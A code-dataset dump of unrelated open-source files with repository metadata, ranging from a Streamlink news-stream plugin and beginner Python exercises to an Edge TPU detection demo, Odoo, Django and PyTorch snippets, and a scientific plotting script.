refs/heads/master
| 2021-01-21T04:32:41.658823 | 2020-09-07T20:56:29 | 2020-09-07T20:56:29 | 101,915,967 | 6 | 4 |
BSD-2-Clause
| 2018-01-14T15:20:47 | 2017-08-30T18:31:47 |
Python
|
UTF-8
|
Python
| false | false | 2,149 |
py
|
import logging
import re
import json
from streamlink.plugin import Plugin
from streamlink.stream import HLSStream
log = logging.getLogger(__name__)
class NowNews(Plugin):
_url_re = re.compile(r"https?://news.now.com/home/live")
epg_re = re.compile(r'''epg.getEPG\("(\d+)"\);''')
api_url = "https://hkt-mobile-api.nowtv.now.com/09/1/getLiveURL"
backup_332_api = "https://d7lz7jwg8uwgn.cloudfront.net/apps_resource/news/live.json"
backup_332_stream = "https://d3i3yn6xwv1jpw.cloudfront.net/live/now332/playlist.m3u8"
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
res = self.session.http.get(self.url)
m = self.epg_re.search(res.text)
channel_id = m and m.group(1)
if channel_id:
log.debug("Channel ID: {0}".format(channel_id))
if channel_id == "332":
# there is a special backup stream for channel 332
bk_res = self.session.http.get(self.backup_332_api)
bk_data = self.session.http.json(bk_res)
if bk_data and bk_data["backup"]:
log.info("Using backup stream for channel 332")
return HLSStream.parse_variant_playlist(self.session, self.backup_332_stream)
api_res = self.session.http.post(self.api_url,
headers={"Content-Type": 'application/json'},
data=json.dumps(dict(channelno=channel_id,
mode="prod",
audioCode="",
format="HLS",
callerReferenceNo="20140702122500")))
data = self.session.http.json(api_res)
for stream_url in data.get("asset", {}).get("hls", {}).get("adaptive", []):
return HLSStream.parse_variant_playlist(self.session, stream_url)
__plugin__ = NowNews
|
[
"[email protected]"
] | |
a5a17178600de20cbfc8a242569037482fae9caf
|
fccb5a43179906ddc3dd37849ac2a89cacf44981
|
/sphinx/source/exercises/solution/03_os_sub_req/ex5.py
|
653a604a993839e3b042cfc9ccaf6cd8eba8ff1f
|
[] |
no_license
|
YasmineOweda/spring2021
|
a48c1c4eaa525053a0e2188cf088124b004a35d8
|
072aadba20bfbc659427265fa228518fe4b09ff3
|
refs/heads/master
| 2023-04-29T10:20:14.132211 | 2021-05-11T09:07:40 | 2021-05-11T09:07:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 435 |
py
|
import os
#1
os.mkdir('os_exercises.')
#2
os.chdir('os_exercises')
open('exercise.py', 'w')
#3
x = input('Please write something to the file: ')
with open('exercise.py', 'w') as f:
f.write(x)
#4
x = input('Please write something More to anoter file: ')
with open('exercise2.py', 'w') as f:
f.write(x)
#5
with open('exercise.py', 'r') as f1:
with open('exercise2.py', 'r' ) as f2:
print(f1.read() + f2.read())
|
[
"[email protected]"
] | |
db3b4d13adbd04eba6106f6e0d8559771deadcd5
|
61699048dc567cd3a814e5b987599dae175bed19
|
/Python/month01/day15/exercise02.py
|
ba4af22e18080c30f44bdc184166efdfe0b8e96a
|
[] |
no_license
|
Courage-GL/FileCode
|
1d4769556a0fe0b9ed0bd02485bb4b5a89c9830b
|
2d0caf3a422472604f073325c5c716ddd5945845
|
refs/heads/main
| 2022-12-31T17:20:59.245753 | 2020-10-27T01:42:50 | 2020-10-27T01:42:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 611 |
py
|
"""
练习2:定义函数,根据生日(年月日),计算活了多天.
输入:2010 1 1
输出:从2010年1月1日到现在总共活了3910天
"""
import time
def life_days(year, month, day):
# 当前 - 出生时间
# time_tuple = time.strptime("%d-%d-%d" % (year, month, day), "%Y-%m-%d")
time_tuple = (year, month, day, 0, 0, 0, 0, 0, 0)
life_second = time.time() - \
time.mktime(time_tuple)
return life_second / 60 / 60 / 24
y = 1990
m = 9
d = 18
result = life_days(y, m, d)
print(f"从{y}年{m}月{d}日到现在总共活了{result:.0f}天")
|
[
"[email protected]"
] | |
ebce17fb0dd02ef5af320607dbcfad78bb6aec8c
|
dcd0fb6bdcb488dd2046778eb02edce8f4623b58
|
/object_follow_edgetpu/detect_standalone.py
|
7e196dbb4d1727616b1a5ec9f56384351df24223
|
[] |
no_license
|
openbsod/Adeept_AWR
|
12f2df24bfcf85d7965a425bb0078b2c858e807a
|
92ca5e7147a9cb44ad55f55a467371648dc76b3c
|
refs/heads/master
| 2023-04-09T07:06:35.772918 | 2021-04-15T21:20:40 | 2021-04-15T21:20:40 | 284,012,618 | 1 | 0 | null | 2020-07-31T10:46:50 | 2020-07-31T10:46:49 | null |
UTF-8
|
Python
| false | false | 4,801 |
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Object detection demo.
This demo script requires Raspberry Pi Camera, and pre-compiled mode.
Get pre-compiled model from Coral website [1]
[1]: https://dl.google.com/coral/canned_models/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite
"""
from edgetpu.detection.engine import DetectionEngine
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
import numpy as np
import time
import io
import picamera
# https://github.com/waveform80/picamera/issues/383
def _monkey_patch_picamera():
original_send_buffer = picamera.mmalobj.MMALPortPool.send_buffer
def silent_send_buffer(zelf, *args, **kwargs):
try:
original_send_buffer(zelf, *args, **kwargs)
except picamera.exc.PiCameraMMALError as error:
if error.status != 14:
raise error
picamera.mmalobj.MMALPortPool.send_buffer = silent_send_buffer
# Read labels.txt file provided by Coral website
def _read_label_file(file_path):
with open(file_path, 'r', encoding="utf-8") as f:
lines = f.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
# Main loop
def main():
model_filename = "mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite"
label_filename = "coco_labels.txt"
engine = DetectionEngine(model_filename)
labels = _read_label_file(label_filename)
CAMERA_WIDTH = 640
CAMERA_HEIGHT = 480
fnt = ImageFont.load_default()
# To view preview on VNC,
# https://raspberrypi.stackexchange.com/a/74390
with picamera.PiCamera() as camera:
_monkey_patch_picamera()
camera.resolution = (CAMERA_WIDTH, CAMERA_HEIGHT)
camera.framerate = 15
camera.rotation = 180
_, width, height, channels = engine.get_input_tensor_shape()
print("{}, {}".format(width, height))
overlay_renderer = None
camera.start_preview()
try:
stream = io.BytesIO()
for foo in camera.capture_continuous(stream,
format='rgb',
use_video_port=True):
# Make Image object from camera stream
stream.truncate()
stream.seek(0)
input = np.frombuffer(stream.getvalue(), dtype=np.uint8)
input = input.reshape((CAMERA_HEIGHT, CAMERA_WIDTH, 3))
image = Image.fromarray(input)
# image.save("out.jpg")
# Make overlay image plane
img = Image.new('RGBA',
(CAMERA_WIDTH, CAMERA_HEIGHT),
(255, 0, 0, 0))
draw = ImageDraw.Draw(img)
# Run detection
start_ms = time.time()
results = engine.DetectWithImage(image,
threshold=0.2, top_k=10)
elapsed_ms = (time.time() - start_ms)*1000.0
if results:
for obj in results:
box = obj.bounding_box.flatten().tolist()
box[0] *= CAMERA_WIDTH
box[1] *= CAMERA_HEIGHT
box[2] *= CAMERA_WIDTH
box[3] *= CAMERA_HEIGHT
# print(box)
# print(labels[obj.label_id])
draw.rectangle(box, outline='red')
draw.text((box[0], box[1]-10), labels[obj.label_id],
font=fnt, fill="red")
camera.annotate_text = "{0:.2f}ms".format(elapsed_ms)
if not overlay_renderer:
overlay_renderer = camera.add_overlay(
img.tobytes(),
size=(CAMERA_WIDTH, CAMERA_HEIGHT), layer=4, alpha=255)
else:
overlay_renderer.update(img.tobytes())
finally:
if overlay_renderer:
camera.remove_overlay(overlay_renderer)
camera.stop_preview()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
a76bbe862fc2f943b5866b00388228264612f33d
|
6d4af63e07a137d382ef61afe8276f7470b7af59
|
/wsgistate/__init__.py
|
742cd2a8b2a8e916a3427188ed7f1c260ff1b2b1
|
[] |
no_license
|
Cromlech/wsgistate
|
142c7016c74fc28e6c56368f018bf113c379118c
|
d730ee47a4a43efbd20bcb9623e76bedeeb8c62b
|
refs/heads/master
| 2023-04-11T14:10:20.522520 | 2023-04-11T10:06:10 | 2023-04-11T10:06:10 | 15,806,829 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,085 |
py
|
# Copyright (c) 2005 Allan Saddi <[email protected]>
# Copyright (c) 2005, the Lawrence Journal-World
# Copyright (c) 2006 L. C. Rees
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Django nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
'''Base Cache class'''
__all__ = ['BaseCache', 'db', 'file', 'memory', 'memcached',
'session', 'simple', 'cache']
def synchronized(func):
'''Decorator to lock and unlock a method (Phillip J. Eby).
@param func Method to decorate
'''
def wrapper(self, *__args, **__kw):
self._lock.acquire()
try:
return func(self, *__args, **__kw)
finally:
self._lock.release()
wrapper.__name__ = func.__name__
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
return wrapper
class BaseCache(object):
'''Base Cache class.'''
def __init__(self, *a, **kw):
super(BaseCache, self).__init__()
timeout = kw.get('timeout', 300)
try:
timeout = int(timeout)
except (ValueError, TypeError):
timeout = 300
self.timeout = timeout
def __getitem__(self, key):
'''Fetch a given key from the cache.'''
return self.get(key)
def __setitem__(self, key, value):
'''Set a value in the cache. '''
self.set(key, value)
def __delitem__(self, key):
'''Delete a key from the cache.'''
self.delete(key)
def __contains__(self, key):
'''Tell if a given key is in the cache.'''
return self.get(key) is not None
def get(self, key, default=None):
'''Fetch a given key from the cache. If the key does not exist, return
default, which itself defaults to None.
@param key Keyword of item in cache.
@param default Default value (default: None)
'''
raise NotImplementedError()
def set(self, key, value):
'''Set a value in the cache.
@param key Keyword of item in cache.
@param value Value to be inserted in cache.
'''
raise NotImplementedError()
def delete(self, key):
'''Delete a key from the cache, failing silently.
@param key Keyword of item in cache.
'''
raise NotImplementedError()
def get_many(self, keys):
'''Fetch a bunch of keys from the cache. Returns a dict mapping each
key in keys to its value. If the given key is missing, it will be
missing from the response dict.
@param keys Keywords of items in cache.
'''
d = dict()
for k in keys:
val = self.get(k)
if val is not None:
d[k] = val
return d
|
[
"[email protected]"
] | |
a658a0212b71fb6327314f0662b6143017559bc1
|
df2cbe914f463ad050d7ed26194424afbe3a0a52
|
/addons/snailmail/models/mail_notification.py
|
a368c0a778338b68f037181c93c3d78bffc3f691
|
[
"Apache-2.0"
] |
permissive
|
SHIVJITH/Odoo_Machine_Test
|
019ed339e995be980606a2d87a63312ddc18e706
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
refs/heads/main
| 2023-07-16T16:23:14.300656 | 2021-08-29T11:48:36 | 2021-08-29T11:48:36 | 401,010,175 | 0 | 0 |
Apache-2.0
| 2021-08-29T10:13:58 | 2021-08-29T10:13:58 | null |
UTF-8
|
Python
| false | false | 719 |
py
|
# -*- coding: utf-8 -*-
from odoo import fields, models
class Notification(models.Model):
_inherit = 'mail.notification'
notification_type = fields.Selection(selection_add=[('snail', 'Snailmail')], ondelete={'snail': 'cascade'})
letter_id = fields.Many2one('snailmail.letter', string="Snailmail Letter", index=True, ondelete='cascade')
failure_type = fields.Selection(selection_add=[
('sn_credit', "Snailmail Credit Error"),
('sn_trial', "Snailmail Trial Error"),
('sn_price', "Snailmail No Price Available"),
('sn_fields', "Snailmail Missing Required Fields"),
('sn_format', "Snailmail Format Error"),
('sn_error', "Snailmail Unknown Error"),
])
|
[
"[email protected]"
] | |
de8b449316abbe86696e3641635d94af6d290c5d
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/caffe2/python/operator_test/stats_put_ops_test.py
|
2ce56248c5dd0116931f91de9b4b556dd881e73b
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:86a74bb87f96bd8ebf2fa9ae72729c5cbe121a32edc1fb034496e084703631b3
size 6596
|
[
"[email protected]"
] | |
a35e6a756f615aca80c4b91a8b264a5aa0cd6d0e
|
9cd00edd008ce38ea3127f090b6867a91fe7193d
|
/src/plot_Qle_at_all_events_above_Tthreh.py
|
382993ac07bd63823ff8cd12124f714a8056199b
|
[] |
no_license
|
shaoxiuma/heatwave_coupling
|
c5a2a2bba53351597f4cb60ecb446bfb9629812f
|
459f6bc72402b5dd3edf49bc3b9be380b5f54705
|
refs/heads/master
| 2021-09-13T06:50:48.733659 | 2018-04-26T06:09:54 | 2018-04-26T06:09:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,338 |
py
|
#!/usr/bin/env python
"""
For each of the OzFlux/FLUXNET2015 sites, plot the TXx and T-4 days
Qle and bowen ratio
That's all folks.
"""
__author__ = "Martin De Kauwe"
__version__ = "1.0 (20.04.2018)"
__email__ = "[email protected]"
import os
import sys
import glob
import netCDF4 as nc
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import pandas as pd
import re
import constants as c
def main(fname):
plot_dir = "plots"
if not os.path.exists(plot_dir):
os.makedirs(plot_dir)
df = pd.read_csv(fname)
df = df[df.pft == "EBF"]
df = df[~np.isnan(df.temp)]
#width = 12.0
#height = width / 1.618
#print(width, height)
#sys.exit()
width = 14
height = 10
fig = plt.figure(figsize=(width, height))
fig.subplots_adjust(hspace=0.05)
fig.subplots_adjust(wspace=0.05)
plt.rcParams['text.usetex'] = False
plt.rcParams['font.family'] = "sans-serif"
plt.rcParams['font.sans-serif'] = "Helvetica"
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['font.size'] = 14
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
count = 0
sites = np.unique(df.site)
for site in sites:
site_name = re.sub(r"(\w)([A-Z])", r"\1 \2", site)
ax = fig.add_subplot(3,3,1+count)
df_site = df[df.site == site]
events = int(len(df_site)/4)
cnt = 0
for e in range(0, events):
from scipy import stats
x = df_site["temp"][cnt:cnt+4]
y = df_site["Qle"][cnt:cnt+4]
slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)
if slope > 0.0 and p_value <= 0.05:
ax.plot(df_site["temp"][cnt:cnt+4], df_site["Qle"][cnt:cnt+4],
label=site, ls="-", marker="o", zorder=100)
elif slope > 0.0 and p_value > 0.05:
ax.plot(df_site["temp"][cnt:cnt+4], df_site["Qle"][cnt:cnt+4],
label=site, ls="-", marker="o", color="lightgrey",
zorder=1)
cnt += 4
if count == 0:
ax.set_ylabel("Qle (W m$^{-2}$)", position=(0.5, 0.0))
if count == 4:
#ax.set_xlabel('Temperature ($^\circ$C)', position=(1.0, 0.5))
ax.set_xlabel('Temperature ($^\circ$C)')
if count < 3:
plt.setp(ax.get_xticklabels(), visible=False)
if count != 0 and count != 3:
plt.setp(ax.get_yticklabels(), visible=False)
props = dict(boxstyle='round', facecolor='white', alpha=1.0,
ec="white")
ax.text(0.04, 0.95, site_name,
transform=ax.transAxes, fontsize=14, verticalalignment='top',
bbox=props)
from matplotlib.ticker import MaxNLocator
ax.yaxis.set_major_locator(MaxNLocator(4))
ax.set_ylim(0, 280)
ax.set_xlim(15, 50)
count += 1
ofdir = "/Users/mdekauwe/Dropbox/fluxnet_heatwaves_paper/figures/figs"
fig.savefig(os.path.join(ofdir, "all_events.pdf"),
bbox_inches='tight', pad_inches=0.1)
#plt.show()
if __name__ == "__main__":
data_dir = "outputs/"
fname = "ozflux_all_events.csv"
fname = os.path.join(data_dir, fname)
main(fname)
|
[
"[email protected]"
] | |
298bdb7986c7ce282903098e71efc3e61ebde167
|
4b0c57dddf8bd98c021e0967b5d94563d15372e1
|
/run_MatrixElement/test/emptyPSets/emptyPSet_qqH125_cfg.py
|
1925d9eb5134f84222300788d85f42237860a66f
|
[] |
no_license
|
aperloff/TAMUWW
|
fea6ed0066f3f2cef4d44c525ee843c6234460ba
|
c18e4b7822076bf74ee919509a6bd1f3cf780e11
|
refs/heads/master
| 2021-01-21T14:12:34.813887 | 2018-07-23T04:59:40 | 2018-07-23T04:59:40 | 10,922,954 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 896 |
py
|
import FWCore.ParameterSet.Config as cms
import os
#!
#! PROCESS
#!
process = cms.Process("MatrixElementProcess")
#!
#! SERVICES
#!
#process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageLogger.MessageLogger_cfi')
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.load('CommonTools.UtilAlgos.TFileService_cfi')
process.TFileService.fileName=cms.string('qqH125.root')
#!
#! INPUT
#!
inputFiles = cms.untracked.vstring(
'root://cmsxrootd.fnal.gov//store/user/aperloff/MatrixElement/Summer12ME8TeV/MEInput/qqH125.root'
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(10))
process.source = cms.Source("PoolSource",
skipEvents = cms.untracked.uint32(0),
fileNames = inputFiles )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
|
[
"[email protected]"
] | |
afbde151e2e1473b1d6aa573579299dc0eb3ce8d
|
18c03a43ce50ee0129f9f45ada1bdaa2ff4f5774
|
/epistasis/__init__.py
|
4f9536d756aca5c653b3e69bbff59937aa2ff678
|
[
"Unlicense"
] |
permissive
|
harmsm/epistasis
|
acf7b5678b328527b2c0063f81d512fcbcd78ce1
|
f098700c15dbd93977d797a1a1708b4cfb6037b3
|
refs/heads/master
| 2022-04-30T13:09:49.106984 | 2022-03-19T05:29:37 | 2022-03-19T05:29:37 | 150,969,948 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,105 |
py
|
"""\
A Python API for modeling statistical, high-order epistasis in genotype-phenotype maps.
This library provides methods for:
1. Decomposing genotype-phenotype maps into high-order epistatic interactions
2. Finding nonlinear scales in the genotype-phenotype map
3. Calculating the contributions of different epistatic orders
4. Estimating the uncertainty of epistatic coefficients amd
5. Interpreting the evolutionary importance of high-order interactions.
For more information about the epistasis models in this library, see our Genetics paper:
`Sailer, Z. R., & Harms, M. J. (2017). "Detecting High-Order Epistasis in Nonlinear Genotype-Phenotype Maps." Genetics, 205(3), 1079-1088.`_
.. _`Sailer, Z. R., & Harms, M. J. (2017). "Detecting High-Order Epistasis in Nonlinear Genotype-Phenotype Maps." Genetics, 205(3), 1079-1088.`: http://www.genetics.org/content/205/3/1079
Currently, this package works only as an API and there is no command-line
interface. Instead, we encourage you use this package inside `Jupyter notebooks`_ .
"""
from .__version__ import __version__
|
[
"[email protected]"
] | |
d8e42f2ce2432b336adb63018b3a51e93aacef6d
|
1c0542cef2ac6a5fb691602887236bf70f9bf71f
|
/speed_test_sar/sfsi_speed/mmcls/models/backbones/utils/gumbel_sigmoid.py
|
6610270f02c80a91e8e61cd013f8b7dff68c6ba3
|
[
"Apache-2.0"
] |
permissive
|
yizenghan/sarNet
|
683f45620013f906cb8a550713e786787074a8ae
|
d47a6e243677811b259a753233fbbaf86d2c9c97
|
refs/heads/master
| 2023-07-16T02:09:11.913765 | 2021-08-30T02:04:02 | 2021-08-30T02:04:02 | 299,276,627 | 11 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,723 |
py
|
import torch
from torch import nn
class GumbelSigmoid(nn.Module):
def __init__(self, max_T, decay_alpha, decay_method='exp', start_iter=0):
super(GumbelSigmoid, self).__init__()
self.max_T = max_T
self.cur_T = max_T
self.step = 0
self.decay_alpha = decay_alpha
self.decay_method = decay_method
self.softmax = nn.Softmax(dim=1)
self.p_value = 1e-8
# self.cur_T = (self.decay_alpha ** start_iter) * self.cur_T
assert self.decay_method in ['exp', 'step', 'cosine']
def forward(self, x):
# Shape <x> : [N, C, H, W]
# Shape <r> : [N, C, H, W]
r = 1 - x
x = (x + self.p_value).log()
r = (r + self.p_value).log()
# Generate Noise
x_N = torch.rand_like(x)
r_N = torch.rand_like(r)
x_N = -1 * (x_N + self.p_value).log()
r_N = -1 * (r_N + self.p_value).log()
x_N = -1 * (x_N + self.p_value).log()
r_N = -1 * (r_N + self.p_value).log()
# Get Final Distribution
x = x + x_N
x = x / (self.cur_T + self.p_value)
r = r + r_N
r = r / (self.cur_T + self.p_value)
x = torch.cat((x, r), dim=1)
x = self.softmax(x)
x = x[:, [0], :, :]
if self.training:
self.cur_T = self.cur_T * self.decay_alpha
# if self.cur_T < 0.5 or not self.training:
# print('cur_T:{0}'.format(self.cur_T))
# self.step += 1
# if self.step % 50 == 0:
# print('cur_T:{0}'.format(self.cur_T))
#
return x
if __name__ == '__main__':
pass
# ToDo: Test Code Here.
# _test_T = 0.6
# Block = GumbelSigmoid(_test_T, 1.0)
|
[
"[email protected]"
] | |
d8e6d6bc745881e200737675ec2cd28b084d364d
|
68c003a526414fef3c23ad591982f1113ca8a72c
|
/api/urls.py
|
6287d8ae58d870352565ce7f626f9a3aa7037130
|
[] |
no_license
|
pawanpaudel93/NepAmbulance
|
9d99ef3a3592b3a17091889d9db32aa952974400
|
b07dba43926c3f5a350b0acd75ac90b4842e3e32
|
refs/heads/master
| 2020-06-14T08:59:03.523102 | 2020-01-07T09:05:03 | 2020-01-07T09:05:03 | 194,965,063 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 761 |
py
|
from django.contrib import admin
from django.urls import path
from .views import ListCreateAmbulance, RetrieveUpdateDeleteAmbulance, ListDistrict, ListProvince
urlpatterns = [
path('ambulance/<int:province>/<slug:district>/<slug:city>/<int:ward>/', ListCreateAmbulance.as_view(), name="list-create-api"),
path('ambulance/<int:province>/<slug:district>/<slug:city>/<int:ward>/<int:pk>/', RetrieveUpdateDeleteAmbulance.as_view()),
# path('get/wards/<slug:city>/', ListWard.as_view(), name="get-wards"),
# path('get/cities/<slug:district>/', ListCity.as_view(), name='get-cities'),
path('get/districts/<slug:province>/', ListDistrict.as_view(), name='get-districts'),
path('get/provinces/', ListProvince.as_view(), name='get-provinces'),
]
|
[
"[email protected]"
] | |
e9a1e970d4704ef0445f93aed0cd5162806488f7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03273/s702731643.py
|
a626a36c61e3c295dfc6c90d75e2a4adb265c98f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 745 |
py
|
from collections import defaultdict
import itertools
import copy
def readInt():
return int(input())
def readInts():
return list(map(int, input().split()))
def readChar():
return input()
def readChars():
return input().split()
def p(arr,b="\n",e="\n"):
print(b,end="")
for i in arr:
for j in i:
print(j,end="")
print()
print(e,end="")
h,w = readInts()
a = [list(input()) for i in range(h)]
for i in range(h-1,-1,-1):
boo = 1
for j in range(w-1,-1,-1):
if a[i][j]=="#":
boo = 0
if boo==1:
del a[i]
for i in range(len(a[0])-1,-1,-1):
boo = 1
for j in range(len(a)-1,-1,-1):
if a[j][i]=="#":
boo = 0
if boo==1:
for j in range(len(a)-1,-1,-1):
del a[j][i]
p(a,b="",e="")
|
[
"[email protected]"
] | |
98f76ec619a2e488aa99de17c4447d474c1cb2e1
|
3f6c16ea158a8fb4318b8f069156f1c8d5cff576
|
/.PyCharm2019.1/system/python_stubs/-1046095393/atexit.py
|
3b4fb40c097ce9444aa1ae283f0da5efbfc50ffd
|
[] |
no_license
|
sarthak-patidar/dotfiles
|
08494170d2c0fedc0bbe719cc7c60263ce6fd095
|
b62cd46f3491fd3f50c704f0255730af682d1f80
|
refs/heads/master
| 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 |
Shell
|
UTF-8
|
Python
| false | false | 4,738 |
py
|
# encoding: utf-8
# module atexit
# from (built-in)
# by generator 1.147
"""
allow programmer to define multiple exit functions to be executedupon normal program termination.
Two public functions, register and unregister, are defined.
"""
# no imports
# functions
def register(func, *args, **kwargs): # real signature unknown; restored from __doc__
"""
register(func, *args, **kwargs) -> func
Register a function to be executed upon normal program termination
func - function to be called at exit
args - optional arguments to pass to func
kwargs - optional keyword arguments to pass to func
func is returned to facilitate usage as a decorator.
"""
pass
def unregister(func): # real signature unknown; restored from __doc__
"""
unregister(func) -> None
Unregister an exit function which was previously registered using
atexit.register
func - function to be unregistered
"""
pass
def _clear(): # real signature unknown; restored from __doc__
"""
_clear() -> None
Clear the list of previously registered exit functions.
"""
pass
def _ncallbacks(): # real signature unknown; restored from __doc__
"""
_ncallbacks() -> int
Return the number of registered exit functions.
"""
return 0
def _run_exitfuncs(): # real signature unknown; restored from __doc__
"""
_run_exitfuncs() -> None
Run all registered exit functions.
"""
pass
# classes
class __loader__(object):
"""
Meta path import for built-in modules.
All methods are either class or static methods to avoid the need to
instantiate the class.
"""
@classmethod
def create_module(cls, *args, **kwargs): # real signature unknown
""" Create a built-in module """
pass
@classmethod
def exec_module(cls, *args, **kwargs): # real signature unknown
""" Exec a built-in module """
pass
@classmethod
def find_module(cls, *args, **kwargs): # real signature unknown
"""
Find the built-in module.
If 'path' is ever specified then the search is considered a failure.
This method is deprecated. Use find_spec() instead.
"""
pass
@classmethod
def find_spec(cls, *args, **kwargs): # real signature unknown
pass
@classmethod
def get_code(cls, *args, **kwargs): # real signature unknown
""" Return None as built-in modules do not have code objects. """
pass
@classmethod
def get_source(cls, *args, **kwargs): # real signature unknown
""" Return None as built-in modules do not have source code. """
pass
@classmethod
def is_package(cls, *args, **kwargs): # real signature unknown
""" Return False as built-in modules are never packages. """
pass
@classmethod
def load_module(cls, *args, **kwargs): # real signature unknown
"""
Load the specified module into sys.modules and return it.
This method is deprecated. Use loader.exec_module instead.
"""
pass
def module_repr(module): # reliably restored by inspect
"""
Return repr for the module.
The method is deprecated. The import machinery does the job itself.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
__dict__ = None # (!) real value is "mappingproxy({'__module__': '_frozen_importlib', '__doc__': 'Meta path import for built-in modules.\\n\\n All methods are either class or static methods to avoid the need to\\n instantiate the class.\\n\\n ', 'module_repr': <staticmethod object at 0x7f1f2a7150f0>, 'find_spec': <classmethod object at 0x7f1f2a715128>, 'find_module': <classmethod object at 0x7f1f2a715160>, 'create_module': <classmethod object at 0x7f1f2a715198>, 'exec_module': <classmethod object at 0x7f1f2a7151d0>, 'get_code': <classmethod object at 0x7f1f2a715240>, 'get_source': <classmethod object at 0x7f1f2a7152b0>, 'is_package': <classmethod object at 0x7f1f2a715320>, 'load_module': <classmethod object at 0x7f1f2a715358>, '__dict__': <attribute '__dict__' of 'BuiltinImporter' objects>, '__weakref__': <attribute '__weakref__' of 'BuiltinImporter' objects>})"
# variables with complex values
__spec__ = None # (!) real value is "ModuleSpec(name='atexit', loader=<class '_frozen_importlib.BuiltinImporter'>, origin='built-in')"
|
[
"[email protected]"
] | |
17a0b25b7520802c0316a50b66f74a804df1a76e
|
caaf56727714f8c03be38710bc7d0434c3ec5b11
|
/tests/components/abode/test_light.py
|
6506746783c2c8bc154c57ee3317833d02c7ff28
|
[
"Apache-2.0"
] |
permissive
|
tchellomello/home-assistant
|
c8db86880619d7467901fd145f27e0f2f1a79acc
|
ed4ab403deaed9e8c95e0db728477fcb012bf4fa
|
refs/heads/dev
| 2023-01-27T23:48:17.550374 | 2020-09-18T01:18:55 | 2020-09-18T01:18:55 | 62,690,461 | 8 | 1 |
Apache-2.0
| 2023-01-13T06:02:03 | 2016-07-06T04:13:49 |
Python
|
UTF-8
|
Python
| false | false | 4,040 |
py
